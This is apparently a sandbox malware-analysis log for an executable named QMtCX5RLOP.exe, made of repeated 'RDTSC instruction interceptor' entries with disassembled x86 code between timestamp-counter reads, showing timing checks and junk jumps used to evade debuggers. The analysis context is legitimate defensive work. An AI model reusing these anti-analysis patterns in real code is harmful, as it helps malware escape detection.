Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6E60EEF second address: 6E60F62 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop edi 0x00000005 pushfd 0x00000006 jmp 00007F9D00F1DB64h 0x0000000b xor al, FFFFFF88h 0x0000000e jmp 00007F9D00F1DB5Bh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 sub eax, eax 0x00000019 pushad 0x0000001a mov bl, EBh 0x0000001c pushfd 0x0000001d jmp 00007F9D00F1DB5Eh 0x00000022 and cx, B2E8h 0x00000027 jmp 00007F9D00F1DB5Bh 0x0000002c popfd 0x0000002d popad 0x0000002e lock cmpxchg dword ptr [edx], ecx 0x00000032 jmp 00007F9D00F1DB66h 0x00000037 pop edi 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6E60F62 second address: 6E60F66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6E60F66 second address: 6E60F6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6E60F6A second address: 6E60F70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6E60F70 second address: 6E60F76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6E60F76 second address: 6E60F7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6E60F7A second address: 6E60F7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6E60F7E second address: 6E60FA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test eax, eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F9D01181AB4h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6E60FA0 second address: 6E60FAF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D00F1DB5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6E60FAF second address: 6E60FC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9D01181AB4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6E60FC7 second address: 6E6104C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D00F1DB5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007F9D6EEBC25Ah 0x00000011 jmp 00007F9D00F1DB66h 0x00000016 mov edx, dword ptr [ebp+08h] 0x00000019 pushad 0x0000001a mov si, EE2Dh 0x0000001e pushfd 0x0000001f jmp 00007F9D00F1DB5Ah 0x00000024 xor cx, EEC8h 0x00000029 jmp 00007F9D00F1DB5Bh 0x0000002e popfd 0x0000002f popad 0x00000030 mov eax, dword ptr [esi] 0x00000032 jmp 00007F9D00F1DB66h 0x00000037 mov dword ptr [edx], eax 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F9D00F1DB67h 0x00000040 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6E6104C second address: 6E61082 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9D01181AAFh 0x00000008 jmp 00007F9D01181AB8h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [esi+04h] 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6E61082 second address: 6E61086 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6E61086 second address: 6E6108A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6E6108A second address: 6E61090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6E61090 second address: 6E61132 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, 3756CF71h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx+04h], eax 0x0000000e jmp 00007F9D01181AB3h 0x00000013 mov eax, dword ptr [esi+08h] 0x00000016 jmp 00007F9D01181AB6h 0x0000001b mov dword ptr [edx+08h], eax 0x0000001e pushad 0x0000001f mov si, 70FDh 0x00000023 movzx esi, di 0x00000026 popad 0x00000027 mov eax, dword ptr [esi+0Ch] 0x0000002a jmp 00007F9D01181AB5h 0x0000002f mov dword ptr [edx+0Ch], eax 0x00000032 pushad 0x00000033 pushfd 0x00000034 jmp 00007F9D01181AACh 0x00000039 jmp 00007F9D01181AB5h 0x0000003e popfd 0x0000003f call 00007F9D01181AB0h 0x00000044 pushad 0x00000045 popad 0x00000046 pop eax 0x00000047 popad 0x00000048 mov eax, dword ptr [esi+10h] 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6E61132 second address: 6E61136 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6E61136 second address: 6E6113C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6E6113C second address: 6E611AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 0421B274h 0x00000008 pushfd 0x00000009 jmp 00007F9D00F1DB5Dh 0x0000000e adc cx, 3836h 0x00000013 jmp 00007F9D00F1DB61h 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov dword ptr [edx+10h], eax 0x0000001f jmp 00007F9D00F1DB5Eh 0x00000024 mov eax, dword ptr [esi+14h] 0x00000027 jmp 00007F9D00F1DB60h 0x0000002c mov dword ptr [edx+14h], eax 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F9D00F1DB67h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6E611AC second address: 6E611CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 movsx edi, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esi+18h] 0x0000000e jmp 00007F9D01181AACh 0x00000013 mov dword ptr [edx+18h], eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6E611CF second address: 6E611D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6E611D3 second address: 6E611D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6E611D9 second address: 6E6120D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D00F1DB64h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+1Ch] 0x0000000c jmp 00007F9D00F1DB60h 0x00000011 mov dword ptr [edx+1Ch], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6E6120D second address: 6E61213 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6E61213 second address: 6E61222 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9D00F1DB5Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6E61222 second address: 6E61253 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D01181AB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esi+20h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F9D01181AADh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6E61253 second address: 6E61263 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9D00F1DB5Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6E61263 second address: 6E612AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+20h], eax 0x0000000b pushad 0x0000000c movsx edi, cx 0x0000000f popad 0x00000010 mov eax, dword ptr [esi+24h] 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F9D01181AB3h 0x0000001c adc al, 0000000Eh 0x0000001f jmp 00007F9D01181AB9h 0x00000024 popfd 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6E612AB second address: 6E612BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9D00F1DB5Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6E612BB second address: 6E61317 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D01181AABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx+24h], eax 0x0000000e pushad 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F9D01181AB1h 0x00000016 sub al, FFFFFFA6h 0x00000019 jmp 00007F9D01181AB1h 0x0000001e popfd 0x0000001f call 00007F9D01181AB0h 0x00000024 pop esi 0x00000025 popad 0x00000026 popad 0x00000027 mov eax, dword ptr [esi+28h] 0x0000002a pushad 0x0000002b mov ax, di 0x0000002e push eax 0x0000002f push edx 0x00000030 mov ax, bx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6E61317 second address: 6E61358 instructions: 0x00000000 rdtsc 0x00000002 mov di, 4978h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 mov dword ptr [edx+28h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F9D00F1DB68h 0x00000015 jmp 00007F9D00F1DB65h 0x0000001a popfd 0x0000001b pushad 0x0000001c popad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6E61358 second address: 6E6139A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 1B20h 0x00000007 jmp 00007F9D01181AB9h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov ecx, dword ptr [esi+2Ch] 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F9D01181AB8h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6E6139A second address: 6E613A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D00F1DB5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6EB0DA1 second address: 6EB0DF0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F9D01181AB7h 0x0000000d xchg eax, ebp 0x0000000e jmp 00007F9D01181AB6h 0x00000013 mov ebp, esp 0x00000015 jmp 00007F9D01181AB0h 0x0000001a pop ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e pushad 0x0000001f popad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6EB0DF0 second address: 6EB0E06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9D00F1DB62h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6EB0E06 second address: 6EB0E0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6E5073E second address: 6E50743 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6E50743 second address: 6E50751 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9D01181AAAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6E50751 second address: 6E50790 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F9D00F1DB67h 0x0000000e mov ebp, esp 0x00000010 jmp 00007F9D00F1DB66h 0x00000015 pop ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6E50790 second address: 6E50796 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6DF0082 second address: 6DF0088 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6DF0671 second address: 6DF068B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D01181AADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov dh, BAh 0x0000000f push eax 0x00000010 pop edx 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6DF068B second address: 6DF06AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D00F1DB61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F9D00F1DB5Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6DF06AF second address: 6DF06B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6DF06B6 second address: 6DF06D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F9D00F1DB64h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6DF06D4 second address: 6DF0715 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D01181AABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F9D01181AB6h 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F9D01181AB7h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6DF0715 second address: 6DF072D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9D00F1DB64h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6DF0A95 second address: 6DF0A9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6DF0A9B second address: 6DF0A9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6E2001D second address: 6E20021 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6E20021 second address: 6E20027 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6E20027 second address: 6E2008E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D01181AAEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov edi, 0C4A4BF4h 0x00000010 pushfd 0x00000011 jmp 00007F9D01181AADh 0x00000016 adc ch, FFFFFFB6h 0x00000019 jmp 00007F9D01181AB1h 0x0000001e popfd 0x0000001f popad 0x00000020 xchg eax, ebp 0x00000021 jmp 00007F9D01181AAEh 0x00000026 mov ebp, esp 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F9D01181AB7h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6E2008E second address: 6E200DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 5BAAh 0x00000007 pushfd 0x00000008 jmp 00007F9D00F1DB5Bh 0x0000000d add cx, 304Eh 0x00000012 jmp 00007F9D00F1DB69h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b and esp, FFFFFFF0h 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 push edi 0x00000022 pop ecx 0x00000023 call 00007F9D00F1DB5Fh 0x00000028 pop ecx 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6E200DC second address: 6E200E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6E200E1 second address: 6E2017B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F9D00F1DB62h 0x0000000a add eax, 6560EF28h 0x00000010 jmp 00007F9D00F1DB5Bh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 sub esp, 44h 0x0000001c jmp 00007F9D00F1DB66h 0x00000021 xchg eax, ebx 0x00000022 jmp 00007F9D00F1DB60h 0x00000027 push eax 0x00000028 pushad 0x00000029 mov si, bx 0x0000002c mov bl, AAh 0x0000002e popad 0x0000002f xchg eax, ebx 0x00000030 pushad 0x00000031 mov esi, 2CB88A01h 0x00000036 popad 0x00000037 push esi 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b pushfd 0x0000003c jmp 00007F9D00F1DB65h 0x00000041 adc ax, 0A06h 0x00000046 jmp 00007F9D00F1DB61h 0x0000004b popfd 0x0000004c push eax 0x0000004d pop edx 0x0000004e popad 0x0000004f rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6E2017B second address: 6E20181 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6E20181 second address: 6E201BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], esi 0x0000000b jmp 00007F9D00F1DB5Bh 0x00000010 xchg eax, edi 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 movsx edx, ax 0x00000017 pushfd 0x00000018 jmp 00007F9D00F1DB5Ch 0x0000001d add esi, 37B2CB08h 0x00000023 jmp 00007F9D00F1DB5Bh 0x00000028 popfd 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6E201BE second address: 6E2027C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F9D01181AAFh 0x00000009 adc esi, 1A915B4Eh 0x0000000f jmp 00007F9D01181AB9h 0x00000014 popfd 0x00000015 push eax 0x00000016 pop ebx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F9D01181AB3h 0x00000022 jmp 00007F9D01181AB3h 0x00000027 popfd 0x00000028 mov si, 082Fh 0x0000002c popad 0x0000002d xchg eax, edi 0x0000002e jmp 00007F9D01181AB2h 0x00000033 mov edi, dword ptr [ebp+08h] 0x00000036 pushad 0x00000037 mov cl, 9Ch 0x00000039 mov dx, A36Eh 0x0000003d popad 0x0000003e mov dword ptr [esp+24h], 00000000h 0x00000046 pushad 0x00000047 movsx ebx, si 0x0000004a pushad 0x0000004b call 00007F9D01181AAAh 0x00000050 pop esi 0x00000051 mov ch, bh 0x00000053 popad 0x00000054 popad 0x00000055 lock bts dword ptr [edi], 00000000h 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d push edx 0x0000005e jmp 00007F9D01181AB4h 0x00000063 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6E2027C second address: 6E2028B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D00F1DB5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6E2028B second address: 6E202DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D01181AB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007F9D71233C31h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov bh, 9Bh 0x00000014 pushfd 0x00000015 jmp 00007F9D01181AB4h 0x0000001a adc esi, 75624ED8h 0x00000020 jmp 00007F9D01181AABh 0x00000025 popfd 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6E202DB second address: 6E202E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6E202E1 second address: 6E202E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6E202E5 second address: 6E2037A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 jmp 00007F9D00F1DB67h 0x0000000e pop esi 0x0000000f jmp 00007F9D00F1DB66h 0x00000014 pop ebx 0x00000015 jmp 00007F9D00F1DB60h 0x0000001a mov esp, ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007F9D00F1DB5Dh 0x00000025 xor ax, 3136h 0x0000002a jmp 00007F9D00F1DB61h 0x0000002f popfd 0x00000030 pushfd 0x00000031 jmp 00007F9D00F1DB60h 0x00000036 adc si, 9858h 0x0000003b jmp 00007F9D00F1DB5Bh 0x00000040 popfd 0x00000041 popad 0x00000042 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6E2037A second address: 6E20392 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9D01181AB4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6E20392 second address: 6E20396 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6E507C1 second address: 6E507C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6E507C7 second address: 6E507CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6E507CB second address: 6E507CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6E507CF second address: 6E507EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F9D00F1DB5Eh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6E507EA second address: 6E507F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D01181AABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
